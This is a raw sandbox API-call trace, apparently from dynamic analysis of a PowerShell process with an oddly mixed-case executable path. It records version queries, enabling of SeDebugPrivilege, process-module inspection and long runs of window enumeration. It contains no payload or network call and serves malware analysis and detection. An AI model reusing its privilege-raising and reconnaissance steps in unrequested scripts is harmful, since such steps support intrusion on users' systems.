Region:
id = 1958
start_va = 0x7ff00270000
end_va = 0x7ff0027ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00270000"
filename = ""
Region:
id = 1959
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Thread:
id = 89
os_tid = 0x428
[0069.690] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0070.030] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
[0070.030] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
[0070.030] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
[0070.030] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
[0071.821] GetVersionExW (in: lpVersionInformation=0xcd900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0071.822] GetVersionExW (in: lpVersionInformation=0xcd900*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd900*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0071.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0071.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0071.830] GetVersionExW (in: lpVersionInformation=0xcd670*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd670*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0071.831] SetErrorMode (uMode=0x1) returned 0x1
[0071.831] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd7d0 | out: lpFileInformation=0xcd7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
[0071.832] SetErrorMode (uMode=0x1) returned 0x1
[0071.834] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcda40 | out: lpdwHandle=0xcda40) returned 0x94c
[0071.872] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bd80c8 | out: lpData=0x2bd80c8) returned 1
[0071.874] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd9b8, puLen=0xcd9b0 | out: lplpBuffer=0xcd9b8*=0x2bd8164, puLen=0xcd9b0) returned 1
[0071.875] lstrlenW (lpString="䅁") returned 1
[0071.880] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x2bd8240, puLen=0xcd920) returned 1
[0071.880] lstrlenW (lpString="Microsoft Corporation") returned 21
[0071.882] CoTaskMemAlloc (cb=0x2e) returned 0x3653c0
[0071.882] lstrcpyW (in: lpString1=0x3653c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
[0071.882] CoTaskMemFree (pv=0x3653c0)
[0071.882] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x2bd8294, puLen=0xcd920) returned 1
[0071.882] lstrlenW (lpString="System.Management.Automation") returned 28
[0071.882] CoTaskMemAlloc (cb=0x3c) returned 0x2e5940
[0071.882] lstrcpyW (in: lpString1=0x2e5940, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
[0071.882] CoTaskMemFree (pv=0x2e5940)
[0071.882] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x2bd82f0, puLen=0xcd920) returned 1
[0071.882] lstrlenW (lpString="6.1.7601.17514") returned 14
[0071.882] CoTaskMemAlloc (cb=0x20) returned 0x36a240
[0071.883] lstrcpyW (in: lpString1=0x36a240, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0071.883] CoTaskMemFree (pv=0x36a240)
[0071.883] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x2bd8330, puLen=0xcd920) returned 1
[0071.883] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0071.883] CoTaskMemAlloc (cb=0x44) returned 0x2e5940
[0071.883] lstrcpyW (in: lpString1=0x2e5940, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0071.883] CoTaskMemFree (pv=0x2e5940)
[0071.883] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x2bd8398, puLen=0xcd920) returned 1
[0071.883] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
[0071.883] CoTaskMemAlloc (cb=0x76) returned 0x2fa990
[0071.883] lstrcpyW (in: lpString1=0x2fa990, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
[0071.883] CoTaskMemFree (pv=0x2fa990)
[0071.883] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x2bd8434, puLen=0xcd920) returned 1
[0071.883] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0071.883] CoTaskMemAlloc (cb=0x44) returned 0x2e5940
[0071.883] lstrcpyW (in: lpString1=0x2e5940, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0071.883] CoTaskMemFree (pv=0x2e5940)
[0071.883] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x2bd8498, puLen=0xcd920) returned 1
[0071.883] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
[0071.883] CoTaskMemAlloc (cb=0x58) returned 0x31f1b0
[0071.883] lstrcpyW (in: lpString1=0x31f1b0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
[0071.883] CoTaskMemFree (pv=0x31f1b0)
[0071.883] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x2bd8514, puLen=0xcd920) returned 1
[0071.883] lstrlenW (lpString="6.1.7601.17514") returned 14
[0071.883] CoTaskMemAlloc (cb=0x20) returned 0x36a240
[0071.883] lstrcpyW (in: lpString1=0x36a240, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0071.883] CoTaskMemFree (pv=0x36a240)
[0071.883] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x2bd81bc, puLen=0xcd920) returned 1
[0071.883] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
[0071.883] CoTaskMemAlloc (cb=0x66) returned 0x2fd990
[0071.883] lstrcpyW (in: lpString1=0x2fd990, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
[0071.883] CoTaskMemFree (pv=0x2fd990)
[0071.883] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x0, puLen=0xcd920) returned 0
[0071.883] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x0, puLen=0xcd920) returned 0
[0071.883] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcd928, puLen=0xcd920 | out: lplpBuffer=0xcd928*=0x0, puLen=0xcd920) returned 0
[0071.883] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd8f8, puLen=0xcd8f0 | out: lplpBuffer=0xcd8f8*=0x2bd8164, puLen=0xcd8f0) returned 1
[0071.884] CoTaskMemAlloc (cb=0x204) returned 0x321690
[0071.884] VerLanguageNameW (in: wLang=0x0, szLang=0x321690, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
[0071.886] CoTaskMemFree (pv=0x321690)
[0071.886] VerQueryValueW (in: pBlock=0x2bd80c8, lpSubBlock="\\", lplpBuffer=0xcd948, puLen=0xcd940 | out: lplpBuffer=0xcd948*=0x2bd80f0, puLen=0xcd940) returned 1
[0071.912] GetCurrentProcessId () returned 0x968
[0071.945] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcc870 | out: lpLuid=0xcc870*(LowPart=0x14, HighPart=0)) returned 1
[0071.947] GetCurrentProcess () returned 0xffffffffffffffff
[0071.948] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xcc890 | out: TokenHandle=0xcc890*=0x2e8) returned 1
[0071.948] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x2bdb940*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0071.994] CloseHandle (hObject=0x2e8) returned 1
[0071.996] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x968) returned 0x2e8
[0072.004] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x2bdb9a8, cb=0x200, lpcbNeeded=0xcd8a8 | out: lphModule=0x2bdb9a8, lpcbNeeded=0xcd8a8) returned 1
[0072.005] GetModuleInformation (in: hProcess=0x2e8, hModule=0x13f630000, lpmodinfo=0x2bdbc18, cb=0x18 | out: lpmodinfo=0x2bdbc18*(lpBaseOfDll=0x13f630000, SizeOfImage=0x77000, EntryPoint=0x13f63c63c)) returned 1
[0072.006] CoTaskMemAlloc (cb=0x804) returned 0x36c9f0
[0072.006] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x13f630000, lpBaseName=0x36c9f0, nSize=0x800 | out: lpBaseName="PoWErSHELL.Exe") returned 0xe
[0072.006] CoTaskMemFree (pv=0x36c9f0)
[0072.006] CoTaskMemAlloc (cb=0x804) returned 0x36c9f0
[0072.006] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x13f630000, lpFilename=0x36c9f0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
[0072.007] CoTaskMemFree (pv=0x36c9f0)
[0072.007] CloseHandle (hObject=0x2e8) returned 1
[0072.012] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x968) returned 0x2e8
[0072.036] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0xcd9d8 | out: lpExitCode=0xcd9d8*=0x103) returned 1
[0072.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bdb088, Length=0x20000, ResultLength=0xcd9a0 | out: SystemInformation=0x12bdb088, ResultLength=0xcd9a0*=0xfeb8) returned 0x0
[0072.069] EnumWindows (lpEnumFunc=0x2b566ac, lParam=0x0) returned 1
[0072.070] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x42c
[0072.070] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x424
[0072.070] GetWindowThreadProcessId (in: hWnd=0x200ce, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.070] GetWindowThreadProcessId (in: hWnd=0x200e8, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.070] GetWindowThreadProcessId (in: hWnd=0x200f6, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.070] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.070] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.070] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.070] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.070] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.070] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.070] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.070] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.071] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.071] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.071] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x530
[0072.071] GetWindowThreadProcessId (in: hWnd=0x50096, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.071] GetWindowThreadProcessId (in: hWnd=0x1008e, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.071] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x428
[0072.071] GetWindow (hWnd=0x10238, uCmd=0x4) returned 0x0
[0072.072] IsWindowVisible (hWnd=0x10238) returned 0
[0072.072] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x768
[0072.072] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x658
[0072.072] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x628
[0072.072] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x628
[0072.072] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x628
[0072.072] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xbc4
[0072.072] GetWindowThreadProcessId (in: hWnd=0x5001c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xbc4
[0072.072] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xbcc
[0072.072] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xbcc
[0072.072] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xbcc
[0072.072] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xbc4
[0072.072] GetWindowThreadProcessId (in: hWnd=0x201d4, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x9b4
[0072.072] GetWindowThreadProcessId (in: hWnd=0x301b8, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x9b4
[0072.072] GetWindowThreadProcessId (in: hWnd=0x301b2, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xa24
[0072.073] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x9b4
[0072.073] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x9b4
[0072.073] GetWindowThreadProcessId (in: hWnd=0x201bc, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x9b4
[0072.073] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x920
[0072.073] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x910
[0072.073] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x900
[0072.073] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8f0
[0072.073] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8e0
[0072.073] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8d0
[0072.073] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8c0
[0072.073] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8b0
[0072.073] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x8a0
[0072.073] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x890
[0072.073] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x880
[0072.073] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x870
[0072.073] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x858
[0072.073] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x844
[0072.073] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x834
[0072.074] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x824
[0072.074] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x814
[0072.074] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x804
[0072.074] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xc8
[0072.074] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x2c8
[0072.074] GetWindowThreadProcessId (in: hWnd=0x50152, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x134
[0072.074] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x5dc
[0072.074] GetWindowThreadProcessId (in: hWnd=0x3014c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x404
[0072.074] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x42c
[0072.074] GetWindowThreadProcessId (in: hWnd=0x10140, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x330
[0072.074] GetWindowThreadProcessId (in: hWnd=0x20136, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x42c
[0072.074] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x330
[0072.074] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x42c
[0072.074] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x404
[0072.074] GetWindowThreadProcessId (in: hWnd=0x200d2, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x404
[0072.075] GetWindowThreadProcessId (in: hWnd=0x200c2, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.075] GetWindowThreadProcessId (in: hWnd=0x200b0, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.075] GetWindowThreadProcessId (in: hWnd=0x200b2, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.075] GetWindowThreadProcessId (in: hWnd=0x200b6, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.075] GetWindowThreadProcessId (in: hWnd=0x200be, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.075] GetWindowThreadProcessId (in: hWnd=0x300cc, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.075] GetWindowThreadProcessId (in: hWnd=0x4009e, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.075] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x624
[0072.075] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x63c
[0072.075] GetWindowThreadProcessId (in: hWnd=0x20110, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x69c
[0072.075] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x650
[0072.075] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x684
[0072.075] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x530
[0072.075] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x61c
[0072.075] GetWindowThreadProcessId (in: hWnd=0x50090, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.075] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x5d8
[0072.075] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.076] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.076] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.076] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.076] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.076] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x530
[0072.076] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x530
[0072.076] GetWindowThreadProcessId (in: hWnd=0x30040, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x504
[0072.076] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x524
[0072.076] GetWindowThreadProcessId (in: hWnd=0x100a6, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x5ec
[0072.076] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x530
[0072.076] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x424
[0072.076] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.076] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x55c
[0072.076] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0xa10
[0072.076] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x980
[0072.076] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x978
[0072.076] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x628
[0072.076] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0xcd700 | out: lpdwProcessId=0xcd700) returned 0x628
